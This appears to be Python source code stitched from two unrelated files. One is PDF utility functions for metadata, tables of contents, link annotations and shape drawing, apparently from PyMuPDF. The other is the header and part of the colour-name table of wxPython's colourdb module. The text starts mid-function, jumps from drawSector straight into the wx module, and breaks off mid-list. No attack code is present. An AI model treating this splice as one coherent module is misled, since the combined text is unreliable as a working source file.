m): """Set a PDF's metadata (/Info dictionary)\nm: dictionary like doc.metadata'.""" if doc.isClosed or doc.isEncrypted: raise ValueError("document closed or encrypted") if type(m) is not dict: raise ValueError("arg2 must be a dictionary") for k in m.keys(): if not k in ("author", "producer", "creator", "title", "format", "encryption", "creationDate", "modDate", "subject", "keywords"): raise ValueError("invalid dictionary key: " + k) d = "<</Author" d += getPDFstr(m.get("author", "none")) d += "/CreationDate" d += getPDFstr(m.get("creationDate", "none")) d += "/Creator" d += getPDFstr(m.get("creator", "none")) d += "/Keywords" d += getPDFstr(m.get("keywords", "none")) d += "/ModDate" d += getPDFstr(m.get("modDate", "none")) d += "/Producer" d += getPDFstr(m.get("producer", "none")) d += "/Subject" d += getPDFstr(m.get("subject", "none")) d += "/Title" d += getPDFstr(m.get("title", "none")) d += ">>" doc._setMetadata(d) doc.initData() return def getDestStr(xref, ddict): """ Calculate the PDF action string. Notes: Supports Link annotations and outline items (bookmarks). """ if not ddict: return "" str_goto = "/A<</S/GoTo/D[%i 0 R/XYZ %g %g %i]>>" str_gotor1 = "/A<</S/GoToR/D[%s /XYZ %s %s %s]/F<</F%s/UF%s/Type/Filespec>>>>" str_gotor2 = "/A<</S/GoToR/D%s/F<</F%s/UF%s/Type/Filespec>>>>" str_launch = "/A<</S/Launch/F<</F%s/UF%s/Type/Filespec>>>>" str_uri = "/A<</S/URI/URI%s>>" if type(ddict) in (int, float): dest = str_goto % (xref, 0, ddict, 0) return dest d_kind = ddict.get("kind", LINK_NONE) if d_kind == LINK_NONE: return "" if ddict["kind"] == LINK_GOTO: d_zoom = ddict.get("zoom", 0) to = ddict.get("to", Point(0, 0)) d_left, d_top = to dest = str_goto % (xref, d_left, d_top, d_zoom) return dest if ddict["kind"] == LINK_URI: dest = str_uri % (getPDFstr(ddict["uri"]),) return dest if ddict["kind"] == LINK_LAUNCH: fspec = getPDFstr(ddict["file"]) dest = str_launch % (fspec, fspec) return dest if ddict["kind"] == LINK_GOTOR and ddict["page"] < 0: fspec = getPDFstr(ddict["file"]) dest = str_gotor2 % (getPDFstr(ddict["to"]), fspec, fspec) return dest if ddict["kind"] == LINK_GOTOR and ddict["page"] >= 0: fspec = getPDFstr(ddict["file"]) dest = str_gotor1 % (ddict["page"], ddict["to"].x, ddict["to"].y, ddict["zoom"], fspec, fspec) return dest return "" def setToC(doc, toc): '''Create new outline tree (table of contents)\ntoc: a Python list of lists. Each entry must contain level, title, page and optionally top margin on the page.''' if doc.isClosed or doc.isEncrypted: raise ValueError("document closed or encrypted") if not doc.isPDF: raise ValueError("not a PDF") toclen = len(toc) # check toc validity ------------------------------------------------------ if type(toc) is not list: raise ValueError("arg2 must be a list") if toclen == 0: return len(doc._delToC()) pageCount = len(doc) t0 = toc[0] if type(t0) is not list: raise ValueError("arg2 must contain lists of 3 or 4 items") if t0[0] != 1: raise ValueError("hierarchy level of item 0 must be 1") for i in list(range(toclen-1)): t1 = toc[i] t2 = toc[i+1] if not -1 <= t1[2] <= pageCount: raise ValueError("row %i:page number out of range" % i) if (type(t2) is not list) or len(t2) < 3 or len(t2) > 4: raise ValueError("arg2 must contain lists of 3 or 4 items") if (type(t2[0]) is not int) or t2[0] < 1: raise ValueError("hierarchy levels must be int > 0") if t2[0] > t1[0] + 1: raise ValueError("row %i: hierarchy step is > 1" % i) # no formal errors in toc -------------------------------------------------- old_xrefs = doc._delToC() # del old outlines, get xref numbers old_xrefs = [] # force creation of new xrefs # prepare table of xrefs for new bookmarks xref = [0] + old_xrefs xref[0] = doc._getOLRootNumber() # entry zero is outline root xref# if toclen > len(old_xrefs): # too few old xrefs? for i in range((toclen - len(old_xrefs))): xref.append(doc._getNewXref()) # acquire new ones lvltab = {0:0} # to store last entry per hierarchy level #============================================================================== # contains new outline objects as strings - first one is outline root #============================================================================== olitems = [{"count":0, "first":-1, "last":-1, "xref":xref[0]}] #============================================================================== # build olitems as a list of PDF-like connnected dictionaries #============================================================================== for i in range(toclen): o = toc[i] lvl = o[0] # level title = getPDFstr(o[1]) # titel pno = min(doc.pageCount - 1, max(0, o[2] - 1)) # page number page = doc[pno] # load the page ictm = ~page._getTransformation() # get inverse transformation matrix top = Point(72, 36) * ictm # default top location dest_dict = {"to": top, "kind": LINK_GOTO} # fall back target if o[2] < 0: dest_dict["kind"] = LINK_NONE if len(o) > 3: # some target is specified if type(o[3]) in (int, float): # if number, make a point from it dest_dict["to"] = Point(72, o[3]) * ictm else: # if something else, make sure we have a dict dest_dict = o[3] if type(o[3]) is dict else dest_dict if "to" not in dest_dict: # target point not in dict? dest_dict["to"] = top # put default in else: # transform target to PDF coordinates point = dest_dict["to"] * ictm dest_dict["to"] = point d = {} d["first"] = -1 d["count"] = 0 d["last"] = -1 d["prev"] = -1 d["next"] = -1 d["dest"] = getDestStr(page.xref, dest_dict) d["top"] = dest_dict["to"] d["title"] = title d["parent"] = lvltab[lvl-1] d["xref"] = xref[i+1] lvltab[lvl] = i+1 parent = olitems[lvltab[lvl-1]] parent["count"] += 1 if parent["first"] == -1: parent["first"] = i+1 parent["last"] = i+1 else: d["prev"] = parent["last"] prev = olitems[parent["last"]] prev["next"] = i+1 parent["last"] = i+1 olitems.append(d) #============================================================================== # now create each ol item as a string and insert it in the PDF #============================================================================== for i, ol in enumerate(olitems): txt = "<<" if ol["count"] > 0: if i > 0: txt += "/Count -%i" % ol["count"] else: txt += "/Count %i" % ol["count"] try: txt += ol["dest"] except: pass try: if ol["first"] > -1: txt += "/First %i 0 R" % xref[ol["first"]] except: pass try: if ol["last"] > -1: txt += "/Last %i 0 R" % xref[ol["last"]] except: pass try: if ol["next"] > -1: txt += "/Next %i 0 R" % xref[ol["next"]] except: pass try: if ol["parent"] > -1: txt += "/Parent %i 0 R" % xref[ol["parent"]] except: pass try: if ol["prev"] > -1: txt += "/Prev %i 0 R" % xref[ol["prev"]] except: pass try: txt += "/Title" + ol["title"] except: pass if i == 0: # special: this is the outline root txt += "/Type/Outlines" txt += ">>" doc._updateObject(xref[i], txt) # insert the PDF object doc.initData() return toclen def do_links(doc1, doc2, from_page = -1, to_page = -1, start_at = -1): '''Insert links contained in copied page range into destination PDF. Parameter values **must** equal those of method insertPDF() - which must have been previously executed.''' #-------------------------------------------------------------------------- # define skeletons for /Annots object texts #-------------------------------------------------------------------------- annot_goto = "<</A<</S/GoTo/D[%i 0 R /XYZ %g %g 0]>>/Rect[%s]/Subtype/Link>>" annot_gotor = "<</A<</S/GoToR/D[%i /XYZ %g %g 0]/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/Subtype/Link>>" annot_gotor_n = "<</A<</S/GoToR/D(%s)/F(%s)>>/Rect[%s]/Subtype/Link>>" annot_launch = "<</A<</S/Launch/F<</F(%s)/UF(%s)/Type/Filespec>>>>/Rect[%s]/Subtype/Link>>" annot_uri = "<</A<</S/URI/URI(%s)>>/Rect[%s]/Subtype/Link>>" #-------------------------------------------------------------------------- # internal function to create the actual "/Annots" object string #-------------------------------------------------------------------------- def cre_annot(lnk, xref_dst, pno_src, ctm): """Create annotation object string for a passed-in link. """ r = lnk["from"] * ctm # rect in PDF coordinates rect = "%g %g %g %g" % tuple(r) if lnk["kind"] == LINK_GOTO: txt = annot_goto idx = pno_src.index(lnk["page"]) p = lnk["to"] * ctm # target point in PDF coordinates annot = txt % (xref_dst[idx], p.x, p.y, rect) elif lnk["kind"] == LINK_GOTOR: if lnk["page"] >= 0: txt = annot_gotor pnt = lnk.get("to", Point(0, 0)) # destination point if type(pnt) is not Point: pnt = Point(0, 0) annot = txt % (lnk["page"], pnt.x, pnt.y, lnk["file"], lnk["file"], rect) else: txt = annot_gotor_n to = getPDFstr(lnk["to"]) to = to[1:-1] f = lnk["file"] annot = txt % (to, f, rect) elif lnk["kind"] == LINK_LAUNCH: txt = annot_launch annot = txt % (lnk["file"], lnk["file"], rect) elif lnk["kind"] == LINK_URI: txt = annot_uri annot = txt % (lnk["uri"], rect) else: annot = "" return annot #-------------------------------------------------------------------------- # validate & normalize parameters if from_page < 0: fp = 0 elif from_page >= doc2.pageCount: fp = doc2.pageCount - 1 else: fp = from_page if to_page < 0 or to_page >= doc2.pageCount: tp = doc2.pageCount - 1 else: tp = to_page if start_at < 0: raise ValueError("'start_at' must be >= 0") sa = start_at incr = 1 if fp <= tp else -1 # page range could be reversed # lists of source / destination page numbers pno_src = list(range(fp, tp + incr, incr)) pno_dst = [sa + i for i in range(len(pno_src))] # lists of source / destination page xrefs xref_src = [] xref_dst = [] for i in range(len(pno_src)): p_src = pno_src[i] p_dst = pno_dst[i] old_xref = doc2._getPageObjNumber(p_src)[0] new_xref = doc1._getPageObjNumber(p_dst)[0] xref_src.append(old_xref) xref_dst.append(new_xref) # create the links for each copied page in destination PDF for i in range(len(xref_src)): page_src = doc2[pno_src[i]] # load source page links = page_src.getLinks() # get all its links if len(links) == 0: # no links there page_src = None continue ctm = ~page_src._getTransformation() # calc page transformation matrix page_dst = doc1[pno_dst[i]] # load destination page link_tab = [] # store all link definitions here for l in links: if l["kind"] == LINK_GOTO and (l["page"] not in pno_src): continue # GOTO link target not in copied pages annot_text = cre_annot(l, xref_dst, pno_src, ctm) if not annot_text: print("cannot create /Annot for kind: " + str(l["kind"])) else: link_tab.append(annot_text) if len(link_tab) > 0: page_dst._addAnnot_FromString(link_tab) page_dst = None page_src = None return def getLinkText(page, lnk): #-------------------------------------------------------------------------- # define skeletons for /Annots object texts #-------------------------------------------------------------------------- annot_goto = "<</A<</S/GoTo/D[%i 0 R/XYZ %g %g 0]>>/Rect[%s]/Subtype/Link>>" annot_goto_n = "<</A<</S/GoTo/D%s>>/Rect[%s]/Subtype/Link>>" annot_gotor = '''<</A<</S/GoToR/D[%i /XYZ %g %g 0]/F<</F(%s)/UF(%s)/Type/Filespec >>>>/Rect[%s]/Subtype/Link>>''' annot_gotor_n = "<</A<</S/GoToR/D%s/F(%s)>>/Rect[%s]/Subtype/Link>>" annot_launch = '''<</A<</S/Launch/F<</F(%s)/UF(%s)/Type/Filespec>> >>/Rect[%s]/Subtype/Link>>''' annot_uri = "<</A<</S/URI/URI(%s)>>/Rect[%s]/Subtype/Link>>" annot_named = "<</A<</S/Named/N/%s/Type/Action>>/Rect[%s]/Subtype/Link>>" ctm = page._getTransformation() ictm = ~ctm r = lnk["from"] height = page.rect.height rect = "%g %g %g %g" % tuple(r * ictm) annot = "" if lnk["kind"] == LINK_GOTO: if lnk["page"] >= 0: txt = annot_goto pno = lnk["page"] xref = page.parent._getPageXref(pno)[0] pnt = lnk.get("to", Point(0, 0)) # destination point ipnt = pnt * ictm annot = txt % (xref, ipnt.x, ipnt.y, rect) else: txt = annot_goto_n annot = txt % (getPDFstr(lnk["to"]), rect) elif lnk["kind"] == LINK_GOTOR: if lnk["page"] >= 0: txt = annot_gotor pnt = lnk.get("to", Point(0, 0)) # destination point if type(pnt) is not Point: pnt = Point(0, 0) annot = txt % (lnk["page"], pnt.x, pnt.y, lnk["file"], lnk["file"], rect) else: txt = annot_gotor_n annot = txt % (getPDFstr(lnk["to"]), lnk["file"], rect) elif lnk["kind"] == LINK_LAUNCH: txt = annot_launch annot = txt % (lnk["file"], lnk["file"], rect) elif lnk["kind"] == LINK_URI: txt = annot_uri annot = txt % (lnk["uri"], rect) elif lnk["kind"] == LINK_NAMED: txt = annot_named annot = txt % (lnk["name"], rect) return annot def updateLink(page, lnk): """ Update a link on the current page. """ CheckParent(page) annot = getLinkText(page, lnk) if annot == "": raise ValueError("link kind not supported") page.parent._updateObject(lnk["xref"], annot, page = page) return def insertLink(page, lnk, mark = True): """ Insert a new link for the current page. """ CheckParent(page) annot = getLinkText(page, lnk) if annot == "": raise ValueError("link kind not supported") page._addAnnot_FromString([annot]) return def insertTextbox(page, rect, buffer, fontname="helv", fontfile=None, set_simple=0, encoding=0, fontsize=11, color=None, fill=None, expandtabs=1, align=0, rotate=0, render_mode=0, border_width=1, morph=None, overlay=True): """ Insert text into a given rectangle. Notes: Creates a Shape object, uses its same-named method and commits it. Parameters: rect: (rect-like) area to use for text. buffer: text to be inserted fontname: a Base-14 font, font name or '/name' fontfile: name of a font file fontsize: font size color: RGB color triple expandtabs: handles tabulators with string function align: left, center, right, justified rotate: 0, 90, 180, or 270 degrees morph: morph box with a matrix and a pivotal point overlay: put text in foreground or background Returns: unused or deficit rectangle area (float) """ img = page.newShape() rc = img.insertTextbox(rect, buffer, fontsize=fontsize, fontname=fontname, fontfile=fontfile, set_simple=set_simple, encoding=encoding, color=color, fill=fill, expandtabs=expandtabs, render_mode=render_mode, border_width=border_width, align=align, rotate=rotate, morph=morph) if rc >= 0: img.commit(overlay) return rc def insertText(page, point, text, fontsize=11, fontname="helv", fontfile=None, set_simple=0, encoding=0, color=None, fill=None, border_width=1, render_mode=0, rotate=0, morph=None, overlay=True): img = page.newShape() rc = img.insertText(point, text, fontsize=fontsize, fontname=fontname, fontfile=fontfile, set_simple=set_simple, encoding=encoding, color=color, fill=fill, border_width=border_width, render_mode=render_mode, rotate=rotate, morph=morph) if rc >= 0: img.commit(overlay) return rc def newPage(doc, pno=-1, width=595, height=842): """Create and return a new page object. """ doc._newPage(pno, width=width, height=height) return doc[pno] def insertPage( doc, pno, text=None, fontsize=11, width=595, height=842, fontname="helv", fontfile=None, color=None, ): """ Create a new PDF page and insert some text. Notes: Function combining Document.newPage() and Page.insertText(). For parameter details see these methods. """ page = doc.newPage(pno=pno, width=width, height=height) if not bool(text): return 0 rc = page.insertText( (50, 72), text, fontsize=fontsize, fontname=fontname, fontfile=fontfile, color=color, ) return rc def drawLine(page, p1, p2, color=None, dashes=None, width=1, lineCap=0, lineJoin=0, overlay=True, morph=None, roundcap=None): """Draw a line from point p1 to point p2. """ img = page.newShape() p = img.drawLine(Point(p1), Point(p2)) img.finish(color=color, dashes=dashes, width=width, closePath=False, lineCap=lineCap, lineJoin=lineJoin, morph=morph, roundCap=roundcap) img.commit(overlay) return p def drawSquiggle(page, p1, p2, breadth = 2, color=None, dashes=None, width=1, lineCap=0, lineJoin=0, overlay=True, morph=None, roundCap=None): """Draw a squiggly line from point p1 to point p2. """ img = page.newShape() p = img.drawSquiggle(Point(p1), Point(p2), breadth = breadth) img.finish(color=color, dashes=dashes, width=width, closePath=False, lineCap=lineCap, lineJoin=lineJoin, morph=morph, roundCap=roundCap) img.commit(overlay) return p def drawZigzag(page, p1, p2, breadth = 2, color=None, dashes=None, width=1, lineCap=0, lineJoin=0, overlay=True, morph=None, roundCap=None): """Draw a zigzag line from point p1 to point p2. """ img = page.newShape() p = img.drawZigzag(Point(p1), Point(p2), breadth = breadth) img.finish(color=color, dashes=dashes, width=width, closePath=False, lineCap=lineCap, lineJoin=lineJoin, morph=morph, roundCap=roundCap) img.commit(overlay) return p def drawRect(page, rect, color=None, fill=None, dashes=None, width=1, lineCap=0, lineJoin=0, morph=None, roundCap=None, overlay=True): """Draw a rectangle. """ img = page.newShape() Q = img.drawRect(Rect(rect)) img.finish(color=color, fill=fill, dashes=dashes, width=width, lineCap=lineCap, lineJoin=lineJoin, morph=morph, roundCap=roundCap) img.commit(overlay) return Q def drawQuad(page, quad, color=None, fill=None, dashes=None, width=1, lineCap=0, lineJoin=0, morph=None, roundCap=None, overlay=True): """Draw a quadrilateral. """ img = page.newShape() Q = img.drawQuad(Quad(quad)) img.finish(color=color, fill=fill, dashes=dashes, width=width, lineCap=lineCap, lineJoin=lineJoin, morph=morph, roundCap=roundCap) img.commit(overlay) return Q def drawPolyline(page, points, color=None, fill=None, dashes=None, width=1, morph=None, lineCap=0, lineJoin=0, roundCap=None, overlay=True, closePath=False): """Draw multiple connected line segments. """ img = page.newShape() Q = img.drawPolyline(points) img.finish(color=color, fill=fill, dashes=dashes, width=width, lineCap=lineCap, lineJoin=lineJoin, morph=morph, roundCap=roundCap, closePath=closePath) img.commit(overlay) return Q def drawCircle(page, center, radius, color=None, fill=None, morph=None, dashes=None, width=1, lineCap=0, lineJoin=0, roundCap=None, overlay=True): """Draw a circle given its center and radius. """ img = page.newShape() Q = img.drawCircle(Point(center), radius) img.finish(color=color, fill=fill, dashes=dashes, width=width, lineCap=lineCap, lineJoin=lineJoin, morph=morph, roundCap=roundCap) img.commit(overlay) return Q def drawOval(page, rect, color=None, fill=None, dashes=None, morph=None,roundCap=None, width=1, lineCap=0, lineJoin=0, overlay=True): """Draw an oval given its containing rectangle or quad. """ img = page.newShape() Q = img.drawOval(rect) img.finish(color=color, fill=fill, dashes=dashes, width=width, lineCap=lineCap, lineJoin=lineJoin, morph=morph, roundCap=roundCap) img.commit(overlay) return Q def drawCurve(page, p1, p2, p3, color=None, fill=None, dashes=None, width=1, morph=None, roundCap=None, closePath=False, lineCap=0, lineJoin=0, overlay=True): """Draw a special Bezier curve from p1 to p3, generating control points on lines p1 to p2 and p2 to p3. """ img = page.newShape() Q = img.drawCurve(Point(p1), Point(p2), Point(p3)) img.finish(color=color, fill=fill, dashes=dashes, width=width, lineCap=lineCap, lineJoin=lineJoin, morph=morph, roundCap=roundCap, closePath=closePath) img.commit(overlay) return Q def drawBezier(page, p1, p2, p3, p4, color=None, fill=None, dashes=None, width=1, morph=None, roundCap=None, closePath=False, lineCap=0, lineJoin=0, overlay=True): """Draw a general cubic Bezier curve from p1 to p4 using control points p2 and p3. """ img = page.newShape() Q = img.drawBezier(Point(p1), Point(p2), Point(p3), Point(p4)) img.finish(color=color, fill=fill, dashes=dashes, width=width, lineCap=lineCap, lineJoin=lineJoin, morph=morph, roundCap=roundCap, closePath=closePath) img.commit(overlay) return Q def drawSector(page, center, point, beta, color=None, fill=None, dashes=None, fullSector=True, morph=None, roundCap=None, width=1, closePath=False, lineCap=0, lineJoin=0, overlay=True): """ Draw a circle sector given circle center, one arc end point and the angle of the arc. Parameters: center -- center of circle point -- arc end point beta -- angle of arc (degrees) fullSector -- connect arc ends with center """ img = page.newShape() Q = img.drawSector(Point(center), Point(point), beta, fullSector=fullSector) img.finish(color=color, fill=fill, dashes=dashes, width=width, lineCap=lineCap, lineJoin=lineJoin, morph=morph, roundCap=roundCap, closePath=closePath) img.commit(overlay) return Q #---------------------------------------------------------------------- # Name: wx.lib.colourdb.py # Purpose: Adds a bunch of colour names and RGB values to the # colour database so they can be found by name # # Author: Robin Dunn # # Created: 13-March-2001 # Copyright: (c) 2001-2017 by Total Control Software # Licence: wxWindows license # Tags: phoenix-port, unittest, documented #---------------------------------------------------------------------- def getColorList(): """ Returns a list of just the colour names used by this module. :rtype: list of strings """ return [ x[0] for x in getColorInfoList() ] def getColorInfoList(): """ Returns the list of colour name/value tuples used by this module. :rtype: list of tuples """ return [ ("ALICEBLUE", 240, 248, 255), ("ANTIQUEWHITE", 250, 235, 215), ("ANTIQUEWHITE1", 255, 239, 219), ("ANTIQUEWHITE2", 238, 223, 204), ("ANTIQUEWHITE3", 205, 192, 176), ("ANTIQUEWHITE4", 139, 131, 120), ("AQUAMARINE", 127, 255, 212), ("AQUAMARINE1", 127, 255, 212), ("AQUAMARINE2", 118, 238, 198), ("AQUAMARINE3", 102, 205, 170), ("AQUAMARINE4", 69, 139, 116), ("AZURE", 240, 255, 255), ("AZURE1", 240, 255, 255), ("AZURE2", 224, 238, 238), ("AZURE3", 193, 205, 205), ("AZURE4", 131, 139, 139), ("BEIGE", 245, 245, 220), ("BISQUE", 255, 228, 196), ("BISQUE1", 255, 228, 196), ("BISQUE2", 238, 213, 183), ("BISQUE3", 205, 183, 158), ("BISQUE4", 139, 125, 107), ("BLACK", 0, 0, 0), ("BLANCHEDALMOND", 255, 235, 205), ("BLUE", 0, 0, 255), ("BLUE1", 0, 0, 255), ("BLUE2", 0, 0, 238), ("BLUE3", 0, 0, 205), ("BLUE4", 0, 0, 139), ("BLUEVIOLET", 138, 43, 226), ("BROWN", 165, 42, 42), ("BROWN1", 255, 64, 64), ("BROWN2", 238, 59, 59), ("BROWN3", 205, 51, 51), ("BROWN4", 139, 35, 35), ("BURLYWOOD", 222, 184, 135), ("BURLYWOOD1", 255, 211, 155), ("BURLYWOOD2", 238, 197, 145), ("BURLYWOOD3", 205, 170, 125), ("BURLYWOOD4", 139, 115, 85), ("CADETBLUE", 95, 158, 160), ("CADETBLUE1", 152, 245, 255), ("CADETBLUE2", 142, 229, 238), ("CADETBLUE3", 122, 197, 205), ("CADETBLUE4", 83, 134, 139), ("CHARTREUSE", 127, 255, 0), ("CHARTREUSE1", 127, 255, 0), ("CHARTREUSE2", 118, 238, 0), ("CHARTREUSE3", 102, 205, 0), ("CHARTREUSE4", 69, 139, 0), ("CHOCOLATE", 210, 105, 30), ("CHOCOLATE1", 255, 127, 36), ("CHOCOLATE2", 238, 118, 33), ("CHOCOLATE3", 205, 102, 29), ("CHOCOLATE4", 139, 69, 19), ("COFFEE", 156, 79, 0), ("CORAL", 255, 127, 80), ("CORAL1", 255, 114, 86), ("CORAL2", 238, 106, 80), ("CORAL3", 205, 91, 69), ("CORAL4", 139, 62, 47), ("CORNFLOWERBLUE", 100, 149, 237), ("CORNSILK", 255, 248, 220), ("CORNSILK1", 255, 248, 220), ("CORNSILK2", 238, 232, 205), ("CORNSILK3", 205, 200, 177), ("CORNSILK4", 139, 136, 120), ("CYAN", 0, 255, 255), ("CYAN1", 0, 255, 255), ("CYAN2", 0, 238, 238), ("CYAN3", 0, 205, 205), ("CYAN4", 0, 139, 139), ("DARKBLUE", 0, 0, 139), ("DARKCYAN", 0, 139, 139), ("DARKGOLDENROD", 184, 134, 11), ("DARKGOLDENROD1", 255, 185, 15), ("DARKGOLDENROD2", 238, 173, 14), ("DARKGOLDENROD3", 205, 149, 12), ("DARKGOLDENROD4", 139, 101, 8), ("DARKGREEN", 0, 100, 0), ("DARKGRAY", 169, 169, 169), ("DARKKHAKI", 189, 183, 107), ("DARKMAGENTA", 139, 0, 139), ("DARKOLIVEGREEN", 85, 107, 47), ("DARKOLIVEGREEN1", 202, 255, 112), ("DARKOLIVEGREEN2", 188, 238, 104), ("DARKOLIVEGREEN3", 162, 205, 90), ("DARKOLIVEGREEN4", 110, 139, 61), ("DARKORANGE", 255, 140, 0), ("DARKORANGE1", 255, 127, 0), ("DARKORANGE2", 238, 118, 0), ("DARKORANGE3", 205, 102, 0), ("DARKORANGE4", 139, 69, 0), ("DARKORCHID", 153, 50, 204), ("DARKORCHID1", 191, 62, 255), ("DARKORCHID2", 178, 58, 238), ("DARKORCHID3", 154, 50, 205), ("DARKORCHID4", 104, 34, 139), ("DARKRED", 139, 0, 0), ("DARKSALMON", 233, 150, 122), ("DARKSEAGREEN", 143, 188, 143), ("DARKSEAGREEN1", 193, 255, 193), ("DARKSEAGREEN2", 180, 238, 180), ("DARKSEAGREEN3", 155, 205, 155), ("DARKSEAGREEN4", 105, 139, 105), ("DARKSLATEBLUE", 72, 61, 139), ("DARKSLATEGRAY", 47, 79, 79), ("DARKTURQUOISE", 0, 206, 209), ("DARKVIOLET", 148, 0, 211), ("DEEPPINK", 255, 20, 147), ("DEEPPINK1", 255, 20, 147), ("DEEPPINK2", 238, 18, 137), ("DEEPPINK3", 205, 16, 118), ("DEEPPINK4", 139, 10, 80), ("DEEPSKYBLUE", 0, 191, 255), ("DEEPSKYBLUE1", 0, 191, 255), ("DEEPSKYBLUE2", 0, 178, 238), ("DEEPSKYBLUE3", 0, 154, 205), ("DEEPSKYBLUE4", 0, 104, 139), ("DIMGRAY", 105, 105, 105), ("DODGERBLUE", 30, 144, 255), ("DODGERBLUE1", 30, 144, 255), ("DODGERBLUE2", 28, 134, 238), ("DODGERBLUE3", 24, 116, 205), ("DODGERBLUE4", 16, 78, 139), ("FIREBRICK", 178, 34, 34), ("FIREBRICK1", 255, 48, 48), ("FIREBRICK2", 238, 44, 44), ("FIREBRICK3", 205, 38, 38), ("FIREBRICK4", 139, 26, 26), ("FLORALWHITE", 255, 250, 240), ("FORESTGREEN", 34, 139, 34), ("GAINSBORO", 220, 220, 220), ("GHOSTWHITE", 248, 248, 255), ("GOLD", 255, 215, 0), ("GOLD1", 255, 215, 0), ("GOLD2", 238, 201, 0), ("GOLD3", 205, 173, 0), ("GOLD4", 139, 117, 0), ("GOLDENROD", 218, 165, 32), ("GOLDENROD1", 255, 193, 37), ("GOLDENROD2", 238, 180, 34), ("GOLDENROD3", 205, 155, 29), ("GOLDENROD4", 139, 105, 20), ("GREEN YELLOW", 173, 255, 47), ("GREEN", 0, 255, 0), ("GREEN1", 0, 255, 0), ("GREEN2", 0, 238, 0), ("GREEN3", 0, 205, 0), ("GREEN4", 0, 139, 0), ("GREENYELLOW", 173, 255, 47), ("GRAY", 190, 190, 190), ("GRAY0", 0, 0, 0), ("GRAY1", 3, 3, 3), ("GRAY10", 26, 26, 26), ("GRAY100", 255, 255, 255), ("GRAY11", 28, 28, 28), ("GRAY12", 31, 31, 31), ("GRAY13", 33, 33, 33), ("GRAY14", 36, 36, 36), ("GRAY15", 38, 38, 38), ("GRAY16", 41, 41, 41), ("GRAY17", 43, 43, 43), ("GRAY18", 46, 46, 46), ("GRAY19", 48, 48, 48), ("GRAY2", 5, 5, 5), ("GRAY20", 51, 51, 51), ("GRAY21", 54, 54, 54), ("GRAY22", 56, 56, 56), ("GRAY23", 59, 59, 59), ("GRAY24", 61, 61, 61), ("GRAY25", 64, 64, 64), ("GRAY26", 66, 66, 66), ("GRAY27", 69, 69, 69), ("GRAY28", 71, 71, 71), ("GRAY29", 74, 74, 74), ("GRAY3", 8, 8, 8), ("GRAY30", 77, 77, 77), ("GRAY31", 79, 79, 79), ("GRAY32", 82, 82, 82), ("GRAY33", 84, 84, 84), ("GRAY34", 87, 87, 87), ("GRAY35", 89, 89, 89), ("GRAY36", 92, 92, 92), ("GRAY37", 94, 94, 94), ("GRAY38", 97, 97, 97), ("GRAY39", 99, 99, 99), ("GRAY4", 10, 10, 10), ("GRAY40", 102, 102, 102), ("GRAY41", 105, 105, 105), ("GRAY42", 107, 107, 107), ("GRAY43", 110, 110, 110), ("GRAY44", 112, 112, 112), ("GRAY45", 115, 115, 115), ("GRAY46", 117, 117, 117), ("GRAY47", 120, 120, 120), ("GRAY48", 122, 122, 122), ("GRAY49", 125, 125, 125), ("GRAY5", 13, 13, 13), ("GRAY50", 127, 127, 127), ("GRAY51", 130, 130, 130), ("GRAY52", 133, 133, 133), ("GRAY53", 135, 135, 135), ("GRAY54", 138, 138, 138), ("GRAY55", 140, 140, 140), ("GRAY56", 143, 143, 143), ("GRAY57", 145, 145, 145), ("GRAY58", 148, 148, 148), ("GRAY59", 150, 150, 150), ("GRAY6", 15, 15, 15), ("GRAY60", 153, 153, 153), ("GRAY61", 156, 156, 156), ("GRAY62", 158, 158, 158), ("GRAY63", 161, 161, 161), ("GRAY64", 163, 163, 163), ("GRAY65", 166, 166, 166), ("GRAY66", 168, 168, 168), ("GRAY67", 171, 171, 171), ("GRAY68", 173, 173, 173), ("GRAY69", 176, 176, 176), ("GRAY7", 18, 18, 18), ("GRAY70", 179, 179, 179), ("GRAY71", 181, 181, 181), ("GRAY72", 184, 184, 184), ("GRAY73", 186, 186, 186), ("GRAY74", 189, 189, 189), ("GRAY75", 191, 191, 191), ("GRAY76", 194, 194, 194), ("GRAY77", 196, 196, 196), ("GRAY78", 199, 199, 199), ("GRAY79", 201, 201, 201), ("GRAY8", 20, 20, 20), ("GRAY80", 204, 204, 204), ("GRAY81", 207, 207, 207), ("GRAY82", 209, 209, 209), ("GRAY83", 212, 212, 212), ("GRAY84", 214, 214, 214), ("GRAY85", 217, 217, 217), ("GRAY86", 219, 219, 219), ("GRAY87", 222, 222, 222), ("GRAY88", 224, 224, 224), ("GRAY89", 227, 227, 227), ("GRAY9", 23, 23, 23), ("GRAY90", 229, 229, 229), ("GRAY91", 232, 232, 232), ("GRAY92", 235, 235, 235), ("GRAY93", 237, 237, 237), ("GRAY94", 240, 240, 240), ("GRAY95", 242, 242, 242), ("GRAY96", 245, 245, 245), ("GRAY97", 247, 247, 247), ("GRAY98", 250, 250, 250), ("GRAY99", 252, 252, 252), ("HONEYDEW", 240, 255, 240), ("HONEYDEW1", 240, 255, 240), ("HONEYDEW2", 224, 238, 224), ("HONEYDEW3", 193, 205, 193), ("HONEYDEW4", 131, 139, 131), ("HOTPINK", 255, 105, 180), ("HOTPINK1", 255, 110, 180), ("HOTPINK2", 238, 106, 167), ("HOTPINK3", 205, 96, 144), ("HOTPINK4", 139, 58, 98), ("INDIANRED", 205, 92, 92), ("INDIANRED1", 255, 106, 106), ("INDIANRED2", 238, 99, 99), ("INDIANRED3", 205, 85, 85), ("INDIANRED4", 139, 58, 58), ("IVORY", 255, 255, 240), ("IVORY1", 255, 255, 240), ("IVORY2", 238, 238, 224), ("IVORY3", 205, 205, 193), ("IVORY4", 139, 139, 131), ("KHAKI", 240, 230, 140), ("KHAKI1", 255, 246, 143), ("KHAKI2", 238, 230, 133), ("KHAKI3", 205, 198, 115), ("KHAKI4", 139, 134, 78), ("LAVENDER", 230, 230, 250), ("LAVENDERBLUSH", 255, 240, 245), ("LAVENDERBLUSH1", 255, 240, 245), ("LAVENDERBLUSH2", 238, 224, 229), ("LAVENDERBLUSH3", 205, 193, 197), ("LAVENDERBLUSH4", 139, 131, 134), ("LAWNGREEN", 124, 252, 0), ("LEMONCHIFFON", 255, 250, 205), ("LEMONCHIFFON1", 255, 250, 205), ("LEMONCHIFFON2", 238, 233, 191), ("LEMONCHIFFON3", 205, 201, 165), ("LEMONCHIFFON4", 139, 137, 112), ("LIGHTBLUE", 173, 216, 230), ("LIGHTBLUE1", 191, 239, 255), ("LIGHTBLUE2", 178, 223, 238), ("LIGHTBLUE3", 154, 192, 205), ("LIGHTBLUE4", 104, 131, 139), ("LIGHTCORAL", 240, 128, 128), 